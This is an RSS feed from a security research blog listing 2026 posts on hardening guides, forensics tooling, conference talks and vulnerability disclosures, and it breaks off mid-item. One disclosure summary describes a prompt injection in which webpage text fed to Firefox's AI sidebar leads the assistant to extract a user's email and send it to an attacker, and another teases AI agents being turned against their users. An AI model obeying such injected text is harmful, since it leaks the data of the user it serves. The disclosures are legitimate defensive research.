<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>Insinuator.net - Bold Statements</title>
    <link>https://insinuator.net/</link>
    <description>Recent content on Insinuator.net - Bold Statements</description>
    <generator>Hugo</generator>
    <language>en-us</language>
    <lastBuildDate>Wed, 12 Aug 2026 00:00:00 +0000</lastBuildDate>
    <atom:link href="https://insinuator.net/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>ERNW White Paper 79: Integrating Incident Analysis and Digital Forensics Tooling for Automated Compromise Detection</title>
      <link>https://insinuator.net/2026/08/ernw-white-paper-79-integrating-incident-analysis-and-digital-forensics-tooling-for-automated-compromise-detection/</link>
      <pubDate>Wed, 12 Aug 2026 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2026/08/ernw-white-paper-79-integrating-incident-analysis-and-digital-forensics-tooling-for-automated-compromise-detection/</guid>
      <description>&lt;p&gt;With this blog post I am pleased to announce the publication of a new ERNW White Paper about our incident analysis and digital forensics framework. It is available on our &lt;a href=&#34;https://ernw.de/en/whitepapers/issue-79.html&#34;&gt;website&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Due to the increasing number and impact of computer security incidents, it has become essential to develop and implement efficient measures for their investigation. However, comprehensive forensic analyses are time-consuming, and this time is often not available to security analysts during computer security incidents. As a result, automated tools are increasingly being used. These tools, however, often cover only a limited scope of the necessary analyses and typically require deep technical expertise to be used effectively.&lt;/p&gt;</description>
    </item>
    <item>
      <title>TIA Project Parser</title>
      <link>https://insinuator.net/2026/08/tia-project-parser/</link>
      <pubDate>Wed, 12 Aug 2026 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2026/08/tia-project-parser/</guid>
      <description>&lt;p&gt;While working on an OT project, we looked into TIA Portal&lt;sup id=&#34;fnref:1&#34;&gt;&lt;a href=&#34;#fn:1&#34; class=&#34;footnote-ref&#34; role=&#34;doc-noteref&#34;&gt;1&lt;/a&gt;&lt;/sup&gt; project files to extract more information about changes, especially timestamps to be able to reconstruct a timeline. The TIA Portal (Totally Integrated Automation Portal) allows to create and upload programs for PLC (Programmable Logic Controller) devices often used in the OT (Operational Technology) landscape. Some attacks are able to find the workstation with the TIA Portal and manipulate the project to reprogram the PLCs. To be able to reconstruct the timeline of these changes we wanted to be able to read the timestamps of events from the TIA project files.&lt;/p&gt;</description>
    </item>
    <item>
      <title>#TROOPERS26 AD &amp; Entra ID Security Track</title>
      <link>https://insinuator.net/2026/08/troopers26-ad-entra-id-security-track/</link>
      <pubDate>Tue, 11 Aug 2026 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2026/08/troopers26-ad-entra-id-security-track/</guid>
      <description>&lt;p&gt;The #TROOPERS26 ‘AD &amp;amp; Entra ID Security’ track delivered an incredible experience – much like the entire conference! We were thrilled to host some of the brightest minds in identity research alongside a highly engaged audience who brought valuable insights to the roundtable discussions. While the presentation slides have already been published on the TROOPERS website, several speakers have shared complementary tools, in-depth blog posts, and active social media threads. To make things easy, we’ve compiled a comprehensive list of all these fantastic resources from the track below.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Your Android Bluetooth Traffic Captures Should Be Live</title>
      <link>https://insinuator.net/2026/07/your-android-bluetooth-traffic-captures-should-be-live/</link>
      <pubDate>Mon, 27 Jul 2026 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2026/07/your-android-bluetooth-traffic-captures-should-be-live/</guid>
      <description>&lt;p&gt;In this post I want to talk about a very essential part of my workflow when dealing with Bluetooth devices, particularly IoT devices with a corresponding mobile app: Live capture of Android Bluetooth traffic with Wireshark.&lt;/p&gt;&#xA;&lt;p&gt;Before you stop reading because you think you know how to do this already, the method does not involve pulling bug reports off your phone, and it does not require root. And most importantly it gives you a &lt;strong&gt;live&lt;/strong&gt; packet log in Wireshark.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Windows Hello for Business – Full Report Has Been Released</title>
      <link>https://insinuator.net/2026/07/windows-hello-for-business-full-report-has-been-released/</link>
      <pubDate>Thu, 16 Jul 2026 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2026/07/windows-hello-for-business-full-report-has-been-released/</guid>
      <description>&lt;p&gt;Yesterday, the BSI (the German Federal Office for Information Security, or Bundesamt für Sicherheit in der Informationstechnik in German) published the first result document from the “Windows dissected” (ger.: “Windows seziert”) project: our analysis of Windows Hello for Business (WHfB). If you have followed this blog over the past year, you have seen the pieces. The full 170-page report has now been published. And it can be downloaded from the &lt;a href=&#34;https://www.bsi.bund.de/DE/Service-Navi/Publikationen/Studien/Windows-seziert/windows-seziert_node.html&#34;&gt;project page&lt;/a&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>TROOPERS26: Integrating Incident Analysis and Digital Forensics Tooling for Automated Compromise Detection</title>
      <link>https://insinuator.net/2026/06/troopers26-integrating-incident-analysis-and-digital-forensics-tooling-for-automated-compromise-detection/</link>
      <pubDate>Mon, 29 Jun 2026 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2026/06/troopers26-integrating-incident-analysis-and-digital-forensics-tooling-for-automated-compromise-detection/</guid>
      <description>&lt;p&gt;Last week I gave a talk at #TROOPERS26: &lt;a href=&#34;https://troopers.de/troopers26/talks/m7qtn7/&#34;&gt;Integrating Incident Analysis and Digital Forensics Tooling for Automated Compromise Detection&lt;/a&gt;. I discussed the challenges of incident analysis, such as increasing storage capacities and the lack of integration between tools. I presented a modular framework that integrates established forensic and analysis tools using a decision-tree-based control mechanism. A workflow was designed to control the execution of 14 integrated analysis tools in order to reproduce the manual analysis process usually performed by analysts. Moreover, the framework is capable of identifying whether a system has been compromised and compiles a analyst-oriented report. Together with the audience we took a look at the report in a live demonstration. The evaluation results of the framework were promising as it was able to identify all compromised systems. However, a significant number of false positive classifications were also observed. To improve the framework possible future extensions include functionality such as recovering already deleted files to detect missed Indicators of Compromise. Additionally, our team want to integrate artificial intelligence in the workflow to help in data processing and make more decisions automatically. The slides will be published next week on the conference website. I will add the link in this blog post when they become available. A more detailed description of the content of the talk can be found in the following sections. Looking forward to #TROOPERS27!&lt;/p&gt;</description>
    </item>
    <item>
      <title>Heads-up: TROOPERS Roundtable – Supply Chain Security</title>
      <link>https://insinuator.net/2026/06/heads-up-troopers-roundtable-supply-chain-security/</link>
      <pubDate>Mon, 22 Jun 2026 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2026/06/heads-up-troopers-roundtable-supply-chain-security/</guid>
      <description>&lt;h2 id=&#34;how-to-strengthen-supply-chain-security-practical-exchange-and-roadmap&#34;&gt;How to strengthen Supply Chain Security: Practical Exchange and Roadmap&lt;/h2&gt;&#xA;&lt;p&gt;Join an open, practitioner-focused roundtable for direct exchange on supply chain security. This session offers a concise overview of core concepts, e.g. SBOM, CSAF, and VEX and digs into the processes behind them: how to obtain, process and apply information to improve security across the supply chain.&lt;/p&gt;&#xA;&lt;p&gt;We will examine:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;How SBOM, CSAF and VEX relate and why version-level detail matters.&lt;/li&gt;&#xA;&lt;li&gt;The practical value of an SBOM and why it’s increasingly required by law and IT procurement.&lt;/li&gt;&#xA;&lt;li&gt;How to create and consume SBOMs?&lt;/li&gt;&#xA;&lt;li&gt;Methods to identify dependencies in the context of vulnerabilities.&lt;/li&gt;&#xA;&lt;li&gt;Approaches to triage: not all vulnerabilities affect every stakeholder equally.&lt;/li&gt;&#xA;&lt;li&gt;Techniques to analyze vulnerabilities and identify affected products and product families.&lt;/li&gt;&#xA;&lt;li&gt;Sources of vulnerability information and how to map data unambiguously to products and specific software versions.&lt;/li&gt;&#xA;&lt;li&gt;Reporting obligations: where and how to disclose vulnerabilities.&lt;/li&gt;&#xA;&lt;li&gt;Tools and automation that help manage information volume and complexity.&lt;/li&gt;&#xA;&lt;li&gt;Technical, organizational and personnel challenges to achieving end-to-end supply chain security.&lt;/li&gt;&#xA;&lt;li&gt;The role of AI in supply chain security.&lt;/li&gt;&#xA;&lt;li&gt;How do we protect ourselves from malicious actors / infected dependencies?&lt;/li&gt;&#xA;&lt;li&gt;The Cyber Resilience Act (CRA): implications for companies, products and consumers, the CRA roadmap, and concrete deadlines and actions.&lt;/li&gt;&#xA;&lt;li&gt;We will show a live demonstration of the whole process, e.g. covering the consumption of SBOMs, vulnerability identification and assessment, creation of VEX documents.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;This roundtable is designed for security practitioners, product owners, compliance officers and decision-makers who want actionable guidance and peer discussion. Expect candid conversation, real-world examples and next steps you can take to strengthen resilience across your supply chains.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Vulnerability Disclosure: Stealing Emails via Firefox’s AI Features</title>
      <link>https://insinuator.net/2026/06/vulnerability-disclosure-stealing-emails-via-firefoxs-ai-features/</link>
      <pubDate>Tue, 16 Jun 2026 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2026/06/vulnerability-disclosure-stealing-emails-via-firefoxs-ai-features/</guid>
      <description>&lt;p&gt;Imagine the following: You visit a webpage with a lot of text you don’t want to read and ask your AI assistant for a summary. A few moments later, the AI assistant has extracted one of your emails and sent it to an attacker without you ever knowing.&lt;/p&gt;&#xA;&lt;p&gt;In October 2025, we found exactly this vulnerability in Firefox’s AI chatbot integration&lt;sup id=&#34;fnref:1&#34;&gt;&lt;a href=&#34;#fn:1&#34; class=&#34;footnote-ref&#34; role=&#34;doc-noteref&#34;&gt;1&lt;/a&gt;&lt;/sup&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Firefox offers a summarization, explaination and proofread AI feature. When a user makes use of one of these features, Firefox pastes a prompt into the sidebar AI chat including the page title, the selected text (or, if the whole page is summarized, a selection is being made by Firefox) and an instruction on how to process the provided text. The sidebar AI chat is essentially an IFrame of a third-party chatbot (Claude, Copilot, …).&lt;/p&gt;</description>
    </item>
    <item>
      <title>Insights into Entra ID’s (Un)Conditional Access</title>
      <link>https://insinuator.net/2026/05/insights-into-entra-ids-unconditional-access/</link>
      <pubDate>Thu, 21 May 2026 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2026/05/insights-into-entra-ids-unconditional-access/</guid>
      <description>&lt;p&gt;When looking at security measures in Microsoft Entra ID environments, a common&#xA;recommendation is to implement Conditional Access policies.&lt;/p&gt;&#xA;&lt;p&gt;Whether Conditional Access is implemented can be quickly checked, and you can&#xA;put a check mark next to it in your best-practice compliance form. However,&#xA;simply implementing conditional access will not provide much security. A&#xA;phishing attack that we recently analyzed highlights this very well.&lt;/p&gt;</description>
    </item>
    <item>
      <title>CVE-2026-47237 – Overly Permissive Istio Permissions Allow Kubeflow Authorization Token Stealing</title>
      <link>https://insinuator.net/2026/05/cve-2026-47237-overly-permissive-istio-permissions-allow-kubeflow-authorization-token-stealing/</link>
      <pubDate>Wed, 20 May 2026 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2026/05/cve-2026-47237-overly-permissive-istio-permissions-allow-kubeflow-authorization-token-stealing/</guid>
      <description>&lt;p&gt;Kubeflow is vulnerable to the theft of authorization tokens by any user of the&#xA;Kubeflow UI or APIs, such as the Dashboard, Pipelines API, or Notebooks. With&#xA;this token, the attacker can take over the user&amp;rsquo;s account and the data that is&#xA;processed by that user. The attacker needs a valid user with the &lt;code&gt;kubeflow-edit&lt;/code&gt;&#xA;or Contributor role in a random Kubeflow namespace to perform this attack. This&#xA;is given if &lt;em&gt;Automatic Profile Creation&lt;/em&gt; is enabled. A setup based on the&#xA;official manifests prior to version 1.10, and on most other packaged Kubeflow&#xA;distributions, is vulnerable.&lt;/p&gt;&#xA;&lt;p&gt;The Istio edit permissions were removed by Kubeflow in a timely manner. Affected&#xA;users should update to the latest version to mitigate this issue.&lt;/p&gt;</description>
    </item>
    <item>
      <title>ERNW White Paper 77: Unified Security Hardening with Cross-Platform Native Binaries</title>
      <link>https://insinuator.net/2026/05/ernw-white-paper-77-unified-security-hardening-with-cross-platform-native-binaries/</link>
      <pubDate>Wed, 20 May 2026 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2026/05/ernw-white-paper-77-unified-security-hardening-with-cross-platform-native-binaries/</guid>
      <description>&lt;p&gt;When configuring a new device, achieving an acceptable Lynis hardening score is&#xA;a challenge most practitioners are familiar with.&lt;/p&gt;</description>
    </item>
    <item>
      <title>ERNW Whitepaper 76: Linux Client Hardening Guide</title>
      <link>https://insinuator.net/2026/05/ernw-whitepaper-76-linux-client-hardening-guide/</link>
      <pubDate>Tue, 19 May 2026 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2026/05/ernw-whitepaper-76-linux-client-hardening-guide/</guid>
      <description>&lt;p&gt;Hardening a Linux client system to an acceptable degree is a time-consuming&#xA;process, one that demands familiarity with a broad set of configuration&#xA;parameters, framework recommendations, and the reasoning behind each control.&lt;/p&gt;&#xA;&lt;p&gt;This post introduces our new Linux client hardening guide&#xA;(&lt;a href=&#34;https://github.com/ernw/hardening/blob/master/operating_system/linux/ERNW_Hardening_Linux.md&#34;&gt;MD&lt;/a&gt;,&#xA;&lt;a href=&#34;https://ernw.de/en/whitepapers/issue-76.html&#34;&gt;PDF&lt;/a&gt;), a comprehensive, publicly&#xA;available hardening reference for Linux systems.&lt;/p&gt;&#xA;&lt;h2 id=&#34;motivation-and-scope&#34;&gt;Motivation and Scope&lt;/h2&gt;&#xA;&lt;p&gt;The guide covers the full breadth of controls needed to significantly raise the&#xA;security posture of a modern Linux installation while preserving operational&#xA;usability (this will be very subjective, the guide reflects my opinion of&#xA;“usable”). It has been developed and validated against Ubuntu 24.04 LTS as the&#xA;primary reference platform, and cross-tested on Fedora, Debian 12, and Arch&#xA;Linux as well as on traditionally server-oriented distributions like openSUSE&#xA;Leap 15.6, Debian 12, Rocky Linux 9, and Red Hat Enterprise Linux 9 while not&#xA;focussing on those as the guide is created for Linux clients.&lt;/p&gt;</description>
    </item>
    <item>
      <title>When paradigms are shifting: InfoSec in the age of AI</title>
      <link>https://insinuator.net/2026/04/when-paradigms-are-shifting-infosec-in-the-age-of-ai/</link>
      <pubDate>Thu, 30 Apr 2026 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2026/04/when-paradigms-are-shifting-infosec-in-the-age-of-ai/</guid>
      <description>&lt;p&gt;Over the last few weeks, I have had a very productive exchange with&#xA;&lt;a href=&#34;https://www.linkedin.com/in/christoph-klaassen-9a4651144/&#34;&gt;Christoph Klaassen&lt;/a&gt;&#xA;on the impact of AI on security governance and compliance. In this post, we&#xA;summarize our thoughts.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Disclosure: Command Injection in Geutebrück Cameras</title>
      <link>https://insinuator.net/2026/04/disclosure-command-injection-in-geutebr%C3%BCck-cameras/</link>
      <pubDate>Thu, 16 Apr 2026 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2026/04/disclosure-command-injection-in-geutebr%C3%BCck-cameras/</guid>
      <description>&lt;p&gt;During a penetration test for a customer, we identified a command injection&#xA;vulnerability in Geutebrück security cameras that allows authenticated attackers&#xA;to execute arbitrary commands as root through the web interface. The root cause&#xA;is unsanitized user input being passed into a &lt;code&gt;sed&lt;/code&gt; script (and at least 12&#xA;other CGI endpoints). In addition to the injection, we identified an XSS&#xA;vulnerability, an exposed system menu leaking configuration and log data, and an&#xA;insecure GET-parameter-to-environment-variable mapping that enables abuse of&#xA;variables like &lt;code&gt;LD_PRELOAD&lt;/code&gt; and &lt;code&gt;LD_DEBUG&lt;/code&gt;. We reported the findings to&#xA;Geutebrück and a patched firmware was provided. This post walks through how we&#xA;got from a  &lt;code&gt;sed&lt;/code&gt; error message to a root shell.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Windows Early Boot Configuration: The CmControlVector and PspSystemMitigationOptions</title>
      <link>https://insinuator.net/2026/04/windows-early-boot-configuration-the-cmcontrolvector-and-pspsystemmitigationoptions/</link>
      <pubDate>Mon, 13 Apr 2026 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2026/04/windows-early-boot-configuration-the-cmcontrolvector-and-pspsystemmitigationoptions/</guid>
      <description>&lt;p&gt;While investigating how process mitigation settings are initialized, I&#xA;encountered the global variable &lt;code&gt;PspSystemMitigationOptions&lt;/code&gt;. Tracing how this&#xA;value is populated led me to the &lt;code&gt;CmControlVector&lt;/code&gt;. In this blog post, we take a&#xA;look at the Windows kernel land configuration manager, especially its global&#xA;&lt;code&gt;CmControlVector&lt;/code&gt; variable. Quick note: the kernel’s configuration manager is&#xA;not related to Microsoft Intune’s&#xA;&lt;a href=&#34;https://learn.microsoft.com/en-us/intune/configmgr/core/understand/introduction&#34;&gt;Configuration Manager&lt;/a&gt;.&#xA;In short, the configuration manager is responsible for managing and implementing&#xA;the registry. However, it is also responsible for setting up parts of the system&#xA;during early boot.&lt;/p&gt;</description>
    </item>
    <item>
      <title>KubeCon &#43; CloudNativeCon Europe 2026</title>
      <link>https://insinuator.net/2026/04/kubecon--cloudnativecon-europe-2026/</link>
      <pubDate>Wed, 01 Apr 2026 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2026/04/kubecon--cloudnativecon-europe-2026/</guid>
      <description>&lt;p&gt;Exactly one week ago, Sven and I had the incredible opportunity to give our very&#xA;first talk at KubeCon + CloudNativeCon&#xA;2026: &lt;a href=&#34;https://kccnceu2026.sched.com/event/2CW2U/how-to-break-multi-tenancy-again-and-again-and-what-we-can-learn-from-it-lorin-lehawany-sven-nobis-ernw?iframe=no&amp;amp;w=100%25&amp;amp;sidebar=yes&amp;amp;bg=no&#34;&gt;How To Break Multi-Tenancy Again and Again …and What We Can Learn From It&lt;/a&gt;.&#xA;We discussed the challenges of namespace-based multi-tenancy and presented&#xA;real-world exploits in&#xA;Kubeflow, &lt;a href=&#34;https://insinuator.net/2026/03/security-considerations-on-istios-crds-with-namespace-based-multi-tenancy/&#34;&gt;Istio&lt;/a&gt;,&#xA;and Traefik that bypass threat boundaries between namespaces and workloads.&#xA;Based on these problems, we developed a methodology to assess and address them.&#xA;You can find the methodology discussed in the talk in&#xA;detail &lt;a href=&#34;https://insinuator.net/2026/03/methodology-for-assessing-namespace-based-multi-tenancy-setups/&#34;&gt;in another blog post&lt;/a&gt; or&#xA;on &lt;a href=&#34;https://github.com/ernw/k8s-multi-tenancy&#34;&gt;GitHub&lt;/a&gt;. You can also find the&#xA;slides &lt;a href=&#34;https://github.com/ernw/k8s-multi-tenancy/blob/main/Slides%20-%20How%20To%20Break%20Multi-Tenancy%20Again%20and%20Again%20...and%20What%20We%20Can%20Learn%20From%20It-%20KubeCon%20+%20CloudNativeCon%20Europe%202026%20-%20final.pdf&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Methodology for Assessing Kubernetes Namespace-Based Multi-Tenancy Setups</title>
      <link>https://insinuator.net/2026/03/methodology-for-assessing-kubernetes-namespace-based-multi-tenancy-setups/</link>
      <pubDate>Thu, 26 Mar 2026 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2026/03/methodology-for-assessing-kubernetes-namespace-based-multi-tenancy-setups/</guid>
      <description>&lt;p&gt;This page introduces our structured methodology for assessing security risks in&#xA;Kubernetes environments that use Namespace-based Multi-Tenancy. It addresses&#xA;weaknesses that break Namespace-based isolation that not well studied, yet. We&#xA;found this issues during our research and presented them together with this&#xA;methodology in our&#xA;&lt;a href=&#34;https://kccnceu2026.sched.com/event/2CW2U/how-to-break-multi-tenancy-again-and-again-and-what-we-can-learn-from-it-lorin-lehawany-sven-nobis-ernw?iframe=yes&amp;amp;w=100%25&amp;amp;sidebar=yes&amp;amp;bg=no&#34;&gt;Talk at KubeCon + CloudNativeCon Europe 2026&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;The methodology assumes that industry best practices, such as NetworkPolicies,&#xA;Role-Based Access Control (RBAC), and Pod Security Standards, are already in&#xA;place. These measures provide a necessary baseline level of protection against&#xA;well-known isolation threats. However, they are insufficient to address a class&#xA;of more subtle attack vectors arising from interactions between tenants and&#xA;shared components. Such attack vectors may still compromise the confidentiality,&#xA;integrity, and availability (CIA) of the cluster and its workloads, even in&#xA;well-hardened environments.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Security Considerations on Istio’s CRDs with Namespace-based Multi-Tenancy</title>
      <link>https://insinuator.net/2026/03/security-considerations-on-istios-crds-with-namespace-based-multi-tenancy/</link>
      <pubDate>Wed, 25 Mar 2026 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2026/03/security-considerations-on-istios-crds-with-namespace-based-multi-tenancy/</guid>
      <description>&lt;p&gt;We reported a possible Man-in-the-Middle (MitM) attack scenario in which&#xA;a &lt;code&gt;VirtualService&lt;/code&gt; can redirect or intercept traffic within the service mesh.&#xA;This affects Namespace-based Multi-Tenancy clusters where tenants have the&#xA;permissions to deploy Istio resources (&lt;code&gt;networking.istio.io/v1&lt;/code&gt;).&lt;/p&gt;&#xA;&lt;p&gt;In collaboration with Istio, we&#xA;published &lt;a href=&#34;https://istio.io/latest/blog/2026/security-considerations-on-namespace-based-multi-tenancy/&#34;&gt;a guest submission in Istio’s blog&lt;/a&gt; (as&#xA;well as below),&#xA;a &lt;a href=&#34;https://istio.io/latest/news/security/istio-security-2026-002/&#34;&gt;Security Bulletin&lt;/a&gt;,&#xA;and an update to&#xA;their &lt;a href=&#34;https://istio.io/latest/docs/ops/deployment/security-model/#k8s-account-compromise&#34;&gt;Security Model&lt;/a&gt; to&#xA;address this issue.&lt;/p&gt;&#xA;&lt;p&gt;This blog post highlights the risks of using Istio in multi-tenant clusters and&#xA;explains how users can mitigate these risks and safely operate Istio in their&#xA;deployments.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Assessing Endpoint Protection: Our Approach to EDR/XDR and Supplements Evaluation</title>
      <link>https://insinuator.net/2026/03/assessing-endpoint-protection-our-approach-to-edr/xdr-and-supplements-evaluation/</link>
      <pubDate>Thu, 19 Mar 2026 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2026/03/assessing-endpoint-protection-our-approach-to-edr/xdr-and-supplements-evaluation/</guid>
      <description>&lt;p&gt;There is a growing landscape of security products promising to protect an&#xA;organization’s IT infrastructure from attacks. Solutions referred to as EDR, and&#xA;sometimes also as XDR, are designed to protect endpoints from all malicious&#xA;activity. The ever-increasing cases of breaches and the associated costs,&#xA;especially in the realm of&#xA;&lt;a href=&#34;https://www.totalassure.com/blog/ransomware-statistics-by-year-2025-comprehensive-report&#34;&gt;ransomware attacks&lt;/a&gt;,&#xA;raise the question of whether there is more that can be done to add an&#xA;additional layer to traditional endpoint protection concepts. That is why a&#xA;customer of ours commissioned us to evaluate whether EDR supplementing solutions&#xA;provide extended protection against ever-evolving threats, as well as to shine a&#xA;light on the performance overheads those solutions might introduce.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Vulnerabilities in Broadcom VMware Aria Operations: Privilege Escalation (CVE-2025-41245 / CVE-2026-22721)</title>
      <link>https://insinuator.net/2026/03/vulnerabilities-in-broadcom-vmware-aria-operations-privilege-escalation-cve-2025-41245-/-cve-2026-22721/</link>
      <pubDate>Wed, 18 Mar 2026 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2026/03/vulnerabilities-in-broadcom-vmware-aria-operations-privilege-escalation-cve-2025-41245-/-cve-2026-22721/</guid>
      <description>&lt;p&gt;During a customer project, we identified privilege escalation vulnerabilities in&#xA;Broadcom VMware Aria Operations. It is possible to escalate the privileges of an&#xA;administrative vCenter user to an Aria administrator and take over systems&#xA;integrated in Aria. Meaning, the vCenter user can gain privileged access to&#xA;systems they have no access to. While both users might sound similarly&#xA;privileged, this is not true in most environments – especially not in complex&#xA;corporate environments: An insignificant vCenter user in a development&#xA;environment can take over all other vCenters in a complex corporate environment.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Hacking a Bluetooth Printer Server: GATT to UART Adapter?</title>
      <link>https://insinuator.net/2026/03/hacking-a-bluetooth-printer-server-gatt-to-uart-adapter/</link>
      <pubDate>Thu, 12 Mar 2026 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2026/03/hacking-a-bluetooth-printer-server-gatt-to-uart-adapter/</guid>
      <description>&lt;p&gt;This blog post describes the journey of how we discovered an interesting&#xA;Bluetooth SoC within the Datong NP330, a&#xA;&lt;a href=&#34;https://www.dtprinter.cn/upload/doc/NP330_NP332UserManual_en.pdf&#34;&gt;Printer Server IoT device&lt;/a&gt;.&#xA;Our initial goal was to reverse-engineer and analyze the Bluetooth controller&#xA;that is included in the device. So we wanted to be able to dump the firmware or,&#xA;if possible, get shell access on the printer server. During that journey we&#xA;found a few vulnerabilities that ultimately let an attacker fully compromise the&#xA;device. This is possible over Bluetooth or network via unauthenticated remote&#xA;code execution with root privileges.&lt;/p&gt;</description>
    </item>
    <item>
      <title>BlackBoxAI: AI Agent can get your computer fully compromised</title>
      <link>https://insinuator.net/2026/03/blackboxai-ai-agent-can-get-your-computer-fully-compromised/</link>
      <pubDate>Tue, 03 Mar 2026 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2026/03/blackboxai-ai-agent-can-get-your-computer-fully-compromised/</guid>
      <description>&lt;p&gt;AI agents are here, there, and everywhere. Smarter, faster, and more skilled,&#xA;they gain greater autonomy and trust. We trust their capabilities to do many&#xA;tasks much faster and sometimes better than we can. We trust them as they&#xA;usually demonstrate their eagerness to please us and fulfill our commands. Isn’t&#xA;that too good to be true, and we might be dealing with a double-edged sword&#xA;here? Can attackers use the same capabilities of the AI agents to attack their&#xA;own users? Can they exploit their eagerness to please their users to fulfill the&#xA;attackers’ intentions? And most importantly: what’s the worst that could happen&#xA;if you fully trust some random AI Agent?&lt;/p&gt;</description>
    </item>
    <item>
      <title>Vulnerability Disclosure: JWT Authentication Bypass in OpenID Connect Authenticator for Tomcat</title>
      <link>https://insinuator.net/2026/02/vulnerability-disclosure-jwt-authentication-bypass-in-openid-connect-authenticator-for-tomcat/</link>
      <pubDate>Tue, 17 Feb 2026 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2026/02/vulnerability-disclosure-jwt-authentication-bypass-in-openid-connect-authenticator-for-tomcat/</guid>
      <description>&lt;p&gt;During a customer project we identified an issue with the validation of JWT&#xA;tokens that allowed us to bypass the authentication by using unsigned tokens&#xA;with arbitrary payloads. During analysis we found out that this is caused by a&#xA;vulnerability within the library&#xA;&lt;a href=&#34;https://github.com/boylesoftware/tomcat-oidcauth&#34;&gt;OpenID Connect Authenticator for Tomcat&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://github.com/boylesoftware/tomcat-oidcauth&#34;&gt;OpenID Connect Authenticator for Tomcat&lt;/a&gt;&#xA;between versions 2.0.0 and 2.5.0, as well as the current state on branch&#xA;&lt;code&gt;master&lt;/code&gt; contain a security flaw (introduced with commit &lt;code&gt;64e9a99&lt;/code&gt;) that allows&#xA;attackers to bypass JWT signature validation easily.&lt;/p&gt;</description>
    </item>
    <item>
      <title>One More Thing: Introducing the New macOS 26 Tahoe Hardening Guide</title>
      <link>https://insinuator.net/2026/02/one-more-thing-introducing-the-new-macos-26-tahoe-hardening-guide/</link>
      <pubDate>Wed, 11 Feb 2026 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2026/02/one-more-thing-introducing-the-new-macos-26-tahoe-hardening-guide/</guid>
      <description>&lt;p&gt;After seven years, we’re publishing a new macOS hardening guide. Fully updated,&#xA;modernized, and now publicly available on&#xA;&lt;a href=&#34;https://github.com/ernw/hardening/blob/master/operating_system/osx/26/Hardening_Guide-macOS_26_Tahoe_1.0.md&#34;&gt;GitHub&lt;/a&gt;&#xA;as&#xA;&lt;a href=&#34;https://github.com/ernw/hardening/blob/master/operating_system/osx/26/Hardening_Guide-macOS_26_Tahoe_1.0.md&#34;&gt;Markdown&lt;/a&gt;&#xA;and on our &lt;a href=&#34;https://ernw.de/en/whitepapers/issue-75.html&#34;&gt;website&lt;/a&gt; as&#xA;&lt;a href=&#34;https://ernw.de/en/whitepapers/issue-75.html&#34;&gt;PDF&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;The previous guide, written for macOS Mojave (10.14), reflected a very different&#xA;macOS security model. At the time, hardening often meant working around the&#xA;operating system, manually enforcing controls, and compensating for missing&#xA;platform guarantees. That guide served its purpose, but the platform has&#xA;fundamentally changed since then.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Capture Bumble Bluetooth Traffic with Wireshark</title>
      <link>https://insinuator.net/2026/02/capture-bumble-bluetooth-traffic-with-wireshark/</link>
      <pubDate>Wed, 04 Feb 2026 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2026/02/capture-bumble-bluetooth-traffic-with-wireshark/</guid>
      <description>&lt;p&gt;When conducting pentests of Bluetooth devices or whilst working on Bluetooth&#xA;related research, we often use &lt;a href=&#34;https://github.com/google/bumble&#34;&gt;Bumble&lt;/a&gt;. In&#xA;this Blogpost I will present a solution to capture a live stream of Bumble&#xA;Bluetooth traffic in Wireshark.&lt;/p&gt;&#xA;&lt;p&gt;Bumble is a fully featured Bluetooth stack, written entirely in Python. What&#xA;makes it extremely powerful for security assessments and research is the level&#xA;of control it provides. It can simulate certain conditions, including errors,&#xA;with a level of precision that most Bluetooth stacks don’t offer. However,&#xA;sometimes you not only need control, you also need visibility.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Incident Response in GCP: Out of Scope – Out of Mind</title>
      <link>https://insinuator.net/2026/01/incident-response-in-gcp-out-of-scope-out-of-mind/</link>
      <pubDate>Tue, 27 Jan 2026 00:00:00 +0000</pubDate>
